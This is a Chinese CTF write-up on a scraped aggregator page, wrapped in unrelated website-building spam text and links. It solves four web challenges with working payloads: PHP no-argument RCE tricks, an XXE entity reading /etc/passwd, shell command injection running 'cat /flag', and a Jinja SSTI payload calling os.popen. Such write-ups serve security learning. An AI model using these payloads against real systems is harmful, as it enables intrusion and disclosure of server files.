当前位置: 首页 > news >正文

深圳网络营销网站设计专做茶叶的网站

深圳网络营销网站设计,专做茶叶的网站,wordpress科技主题公园,公司建设网站属于什么科目文章目录 前言题目[GXYCTF 2019]禁止套娃方法一方法二 [NCTF 2019]Fake XML cookbook[NSSRound#7 Team]ec_RCE[NCTF 2018]Flask PLUS 前言 今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成&am…

文章目录

  • 前言
  • 题目
    • [GXYCTF 2019]禁止套娃
      • 方法一
      • 方法二
    • [NCTF 2019]Fake XML cookbook
    • [NSSRound#7 Team]ec_RCE
    • [NCTF 2018]Flask PLUS


前言

今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。


题目

[GXYCTF 2019]禁止套娃

打开题目,直接扫一下目录
发现是存在git泄露—参考文章

在这里插入图片描述然后使用专门的工具Githack(下载地址)
打开终端,运行python(运行后要访问,/.git/才能有结果)

在这里插入图片描述源代码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>

分析一下
第一个if语句禁用了一些php伪协议
第二个if语句很明显是无参rce的标志,一般代码为

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    eval($_GET['code']);
}

第三个if语句是禁用我们要rce的一些函数,比如phpinfo()

所以rce的关键是无参

方法一

使用session_start()+session_id()读取文件(php<7)

payload

?exp=show_source(session_id(session_start())); 
Cookie: PHPSESSID=flag.php

得到flag

在这里插入图片描述

方法二

php函数直接读取文件

先读取数组,查看flag在第几个
payload

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
发现是第三个,那么我们可以先倒序再读取第二个

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

即可得到flag

[NCTF 2019]Fake XML cookbook

打开题目,根据提示应该不是sql注入
随便输入然后bp抓包,发现是xml格式的登录

在这里插入图片描述联想到XML中存在的XXE漏洞
payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>1</password></user>

在这里插入图片描述修改下命令,直接得到flag

在这里插入图片描述

[NSSRound#7 Team]ec_RCE

源代码

 <!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHPif(!isset($_POST["action"]) && !isset($_POST["data"]))show_source(__FILE__);putenv('LANG=zh_TW.utf8'); $action = $_POST["action"];$data = "'".$_POST["data"]."'";$output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");echo $output;    
?> 

分析一下,有两个POST参数可控,然后出现shell_exec()函数
它的作用:将字符串作为OS命令执行,需要输出执行结果,且输出全部的内容。
payload

action=||&data='cat /flag'
或者
action=;cat /flag&data=

得到flag

[NCTF 2018]Flask PLUS

打开题目,在url输入{{7*7}}
在这里插入图片描述发现存在ssti漏洞

payload

{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}

在这里插入图片描述
然后得到flag
在这里插入图片描述

http://www.yayakq.cn/news/363497/

相关文章:

  • 建网站的客户微网站不能分享朋友圈
  • 企业做什么需要有网站wordpress模板如何安装教程视频教程
  • 苏州住房和城乡建设局网站首页百度快照首页
  • 做网站阳泉购物网站创业时是如何做宣传的
  • 企业网站的建设对于网络品牌的塑造作用做石材网站步骤
  • 在线教育网站制作wordpress侧边二级导航菜单
  • 捷克网站后缀曲阜网架公司
  • 新媒体广告代理加盟seo是网站搜索引擎上的优化
  • 河北省建设厅办事大厅网站做服装设计有什么网站可以参考
  • 一女被多男做的视频网站如何外贸网站推广
  • 网站建设岗位的任职资格如何远程登录网站服务器
  • 山东富国建设投资有限公司网站wordpress 数据库管理
  • 商务网站的推广方法有哪些如何在建设银行网站预约纪念币
  • 百度做网站电话多少wordpress默认排序
  • 让蜘蛛不抓取网站的文件夹做网站具体流程
  • 网站不符合个人备案性质上传设计作品的网站
  • 肇庆专业网站建设服务惠州专业网站制作公司
  • 就业创业网站建设做淘宝推广开网站合适
  • 天津网站建设招聘广州网站建设骏域环保地板
  • 网站源码是html怎么转成php网站国内做的比较简洁的网站
  • dw淘宝网页制作视频教程咸阳做网站优化
  • 商融交通建设工程有限公司网站互联网保险发展趋势
  • 网站年费怎么做分录建设网站时的常见故障分类
  • 营口网站设计用户体验设计软件
  • 六安网站制作哪里有万网创始人
  • php网站建设论文抖音小程序推广
  • 个旧市城乡建设局网站设计一个简单的网络规划方案
  • 贺州市八步区建设局网站wordpress 安全 插件
  • 甘孜州住房和城乡规划建设局网站徐州整站优化
  • 网站建设的成功之处有哪些flash网站制作软件